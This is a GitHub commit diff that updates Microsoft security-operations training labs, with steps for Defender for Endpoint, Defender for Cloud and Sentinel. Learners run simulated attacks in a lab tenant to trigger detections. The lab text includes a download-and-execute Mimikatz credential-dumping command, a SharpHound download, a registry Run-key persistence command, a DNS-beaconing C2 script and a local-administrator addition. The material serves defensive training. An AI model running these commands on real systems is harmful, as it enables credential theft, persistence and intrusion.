Skip to content

Commit

Permalink
Merge pull request #251 from KenMAG/master
Browse files Browse the repository at this point in the history 
Fixes issues #235 and #243
  • Loading branch information
@KenMAG
KenMAG authored Jan 26, 2024
2 parents bc81f0b + 9d19b7d commit 8f06a55
Show file tree
Hide file tree
Showing 5 changed files with 166 additions and 102 deletions.
60 changes: 48 additions & 12 deletions Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,15 +14,14 @@ You are a Security Operations Analyst working at a company that is implementing

To explore the Defender for Endpoint attack mitigation capabilities, you will run two simulated attacks.


>**Note:** An **[interactive lab simulation](https://mslabs.cloudguides.com/guides/SC-200%20Lab%20Simulation%20-%20Mitigate%20attacks%20with%20Microsoft%20Defender%20for%20Endpoint)** is available that allows you to click through this lab at your own pace. You may find slight differences between the interactive simulation and the hosted lab, but the core concepts and ideas being demonstrated are the same.

### Task 1: Verify Device onboarding

In this task, you will confirm that the device is onboarded successfully and create a test alert.

1. If you are not already at the Microsoft 365 Defender portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant.
1. If you are not already at the Microsoft Defender XDR portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant.

1. In the left-hand menu, under the **Assets** area, select **Devices**. Please wait until WIN1 appears in the Devices page before you continue. Otherwise, you might need to repeat this task to see the alerts that will be generated later.

Expand All @@ -38,35 +37,72 @@ In this task, you will confirm that the device is onboarded successfully and cre

1. When the "User Account Control" window is shown, select **Yes** to allow the app to run.

1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it. **Note:** The window closes automatically after running the script.
1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it.

>**Note:** The window closes automatically after running the script.
### Task 2: Simulated Attacks

In this task, you will run two simulated attacks to explore the capabilities of Microsoft Defender for Endpoint.
In this task, you will run two *simulated* attacks using *PowerShell* on *WIN1* to explore the capabilities of Microsoft Defender for Endpoint.

`Attack 1: Mimikatz - Credential Dumping`

1. On the *WIN1* machine, type **Command** in the search bar and select **Run as administrator**.

1. Copy and paste the following command in the **Administrator: Command Prompt** window and press **Enter** to run it.

```CommandPrompt
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
1. You should see a message that says *Access is denied*, and a pop-up message from `Microsoft Defender Antivirus, Windows Security Virus and threats protection` displaying *Threats found*.
1. Exit the **Administrator: Command Prompt** window by typing **exit** and pressing **Enter**.
`Attack 2: Bloodhound - Collection`
1. On the *WIN1* machine, type **PowerShell** in the search bar, select **Windows PowerShell** and select **Run as administrator**.
1. From the left menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side.
1. Copy and paste the following commands in the **Administrator: Windows PowerShell** window and press **Enter** to run it.
```PowerShell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
```
>**Note:** It is recommended to copy, paste and run the commands one at a time. You can open *Notepad* and copy the commands into a temporary file to accomplish this. The first command creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located. The second command downloads the *SharpHound.ps1* file from the *BloodHound* GitHub repository and saves it in the *ExternalPayloads* folder.
1. You should see a pop-up message from `Windows Security Virus and threats protection` displaying *Threats found*.
1. Copy and paste the following command in the **Administrator: Windows PowerShell** window and press **Enter** to run it.
```PowerShell
Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
```
1. If the output is *True*, the Malware payload file has not been removed by Microsoft Defender Antivirus. If the output is *False*, the Malware payload file has been removed by Microsoft Defender Antivirus. Use the up-arrow key to repeat the command until the output is *False*.
<!---1. From the left menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side.
1. Select the **Tutorials** tab.
1. Under *Automated investigation (backdoor)* you will see a message describing the scenario. Below this paragraph, click **Read the walkthrough**. A new browser tab opens which includes instructions to perform the simulation.
1. In the new browser tab, locate the section named **Run the simulation** (page 5, starting at step 2) and follow the steps to run the attack. **Hint:** The simulation file *RS4_WinATP-Intro-Invoice.docm* can be found back in portal, just below the **Read the walkthrough** you selected in the previous step by selecting the **Get simulation file** button.
<!--- 1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV --->

1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV --->
### Task 3: Investigate the Attacks
1. In the Microsoft 365 Defender portal select **Incidents & alerts** from the left menu bar, then select **Incidents**.
1. In the Microsoft Defender XDR portal select **Incidents & alerts** from the left menu bar, then select **Incidents**.
1. A new incident called "Multi-stage incident..." is in the right pane. Select the incident name to load its details.
1. A new incident called "Multiple threat families detected on one endpoint" is in the right pane. Select the incident name to load its details.
>**Note:** An incident called "Suspicious..." might appear first. This will later be replaced with the aforementioned incident when Microsoft 365 Defender correlates them a single security issue, including the original test alert created in Task 1.
>**Note:** You should see both *Bloodhound* and Mimikatz* alerts in the **Alerts** pane. In **Assets/Devices**, the *win1* computer will now have a **Risk level** of *High*..
1. Select the **Manage incident** button and a new window blade appears.
1. Under **Incident tags** type "Tutorial" and select **Tutorial (Create new)** to create a new tag.
1. Under **Incident tags** type "Simulation" and select **Simulation (Create new)** to create a new tag.
1. Select the toggle **Assign to** and add your user account (Me) as owner of the incident.
Expand All @@ -78,6 +114,6 @@ In this task, you will run two simulated attacks to explore the capabilities of
1. Review the contents of the *Attack story, Alerts, Assets, Investigations, Evidence and Response*, and *Summary* tabs. Devices and Users are under the *Assets* tab. The *Attack story* tab displays the *Incident graph*. The **Hint:** Some tabs might be hidden due the size of your display. Select the ellipsis tab (...) to make them appear.
>**Warning:** The simulations and tutorials here are an excellent source of learning through practice. Simulations and tutorials are being added and edited regularly in the portal. However, some of these simulations & tutorials may interfere with performance of the labs designed for this training course. Only perform the simulations and tutorials recommended in the instructions provided for this lab when using the course provided Azure tenant. You may perform the other simulations and tutorials *after* this training course is complete with this tenant.
>**Warning:** The simulated attacks here are an excellent source of learning through practice. Only perform the attacks in the instructions provided for this lab when using the course provided Azure tenant. You may perform other simulated attacks *after* this training course is complete with this tenant.
## You have completed the lab.
17 changes: 9 additions & 8 deletions Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -37,22 +37,23 @@ In this task, you will review Regulatory compliance configuration in Microsoft D

1. Select your subscription.

1. Under *Policy settings*, select **Security policy** in the portal menu.
>**Hint:** Select **Expand all** to find your subscription if you a hierarchy of Management Groups.
1. Scroll down and and review the "Industry & regulatory standards" available to you by default. Note that *ISO 27001* is now deprecated.
1. Under *Settings*, select **Security policy** in the portal menu.

1. Select **Add more standards** to add the updated ISO 27001:2013 regulatory standard.
1. Scroll down and and review the "Security standards" available to you by default.

1. Select the **Add** button to right of *ISO 27001:2013*.
1. Use the search box to find *ISO 27001:2013*.

1. A new page to assign the Azure Policy initiative opens. Confirm that your subscription is selected under *Scope* and click **Review and create**.
1. Select and move the **Status** slider to right of *ISO 27001:2013* to **On**.

1. Select **Create** to assign the Azure Policy initiative to your subscription.
>**Note:** Some standards require you to assign ane Azure Policy initiative.
1. Select Microsoft Defender for Cloud below the search box to return to the main blade.
1. Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On* for your subscription.

>**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations.
1. Close the *Security policies* page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**.

>**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations.
### Task 2: Explore Security posture and recommendations

Expand Down
2 changes: 1 addition & 1 deletion Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -37,7 +37,7 @@ In this task, you will access your Microsoft Sentinel workspace.

1. Select *Create incidents based on Microsoft Defender for Cloud* from the rule templates.

1. Select **Create rule** in the connector information blade.
1. Select **Create rule** in the rule information pane, or select the ellipsis (...) and **+ Create rule**.

1. In the Analytics rule wizard, select **Next: Automated response**, then select **Next: Review and create**.

Expand Down
146 changes: 73 additions & 73 deletions Instructions/VTD_Demos/00-prerequisites.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -581,98 +581,98 @@ In this task, you will perform attacks on a host with Microsoft Defender for End
1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear.

1. In the command prompt, enter the command in each row pressing Enter key after each row:
```
cd \
mkdir temp
cd temp
```

```CommandPrompt
cd \
mkdir temp
cd temp
```
1. Copy and run this command:
```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat"
```
```CommandPrompt
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat"
```
### Task 2: Create C2 (command and control) attack
1. Login to `WIN1` virtual machine as Admin with the password: **Pa55w.rd**.
1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear.
1.
1.
1. Attack 2 - Copy and run this command:

```
notepad c2.ps1
```
Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**.

**Note** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file.

```
param(
[string]$Domain = "microsoft.com",
[string]$Subdomain = "subdomain",
[string]$Sub2domain = "sub2domain",
[string]$Sub3domain = "sub3domain",
[string]$QueryType = "TXT",
[int]$C2Interval = 8,
[int]$C2Jitter = 20,
[int]$RunTime = 240
)
1. Attack 2 - Copy and run this command:
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
```CommandPrompt
notepad c2.ps1
```
$x2 = 1
$x3 = 1
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**.
if ($x2 -eq 3 )
{
Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x2 = 1
>**Note:** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file.
}
else
{
$x2 = $x2 + 1
}
```PowerShell
if ($x3 -eq 7 )
{
Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x3 = 1
param(
[string]$Domain = "microsoft.com",
[string]$Subdomain = "subdomain",
[string]$Sub2domain = "sub2domain",
[string]$Sub3domain = "sub3domain",
[string]$QueryType = "TXT",
[int]$C2Interval = 8,
[int]$C2Jitter = 20,
[int]$RunTime = 240
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
$x2 = 1
$x3 = 1
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
if ($x2 -eq 3 )
{
Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x2 = 1
}
else
{
$x2 = $x2 + 1
}
if ($x3 -eq 7 )
{
Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x3 = 1
}
else
{
$x3 = $x3 + 1
}
$Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval
Start-Sleep -Seconds $Jitter
}
else
{
$x3 = $x3 + 1
}
Until ($TimeNow -ge $RunEnd)
```
$Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval
Start-Sleep -Seconds $Jitter
}
Until ($TimeNow -ge $RunEnd)
At the command prompt, enter the following, enter the command in each row pressing Enter key after each row:
```
```PowerShell
.\c2.ps1
```
At the command prompt, enter the following, enter the command in each row pressing Enter key after each row:
```
powershell
.\c2.ps1
```
**Note:** You will see resolve errors. This is to be expected.
Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing.
>**Note:** You will see resolve errors. This is to be expected.
Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing.
### Task 2: Attack Windows configured with the Azure Monitor Agent (AMA)
Expand All @@ -692,6 +692,6 @@ In this task, you will perform attacks on a host with the Security Events connec
net localgroup administrators theusernametoadd /add
```
>**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username.
>**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username.
1. In the `Output` window you should see `The command completed successfully` three times
Loading

0 comments on commit 8f06a55

Please sign in to comment.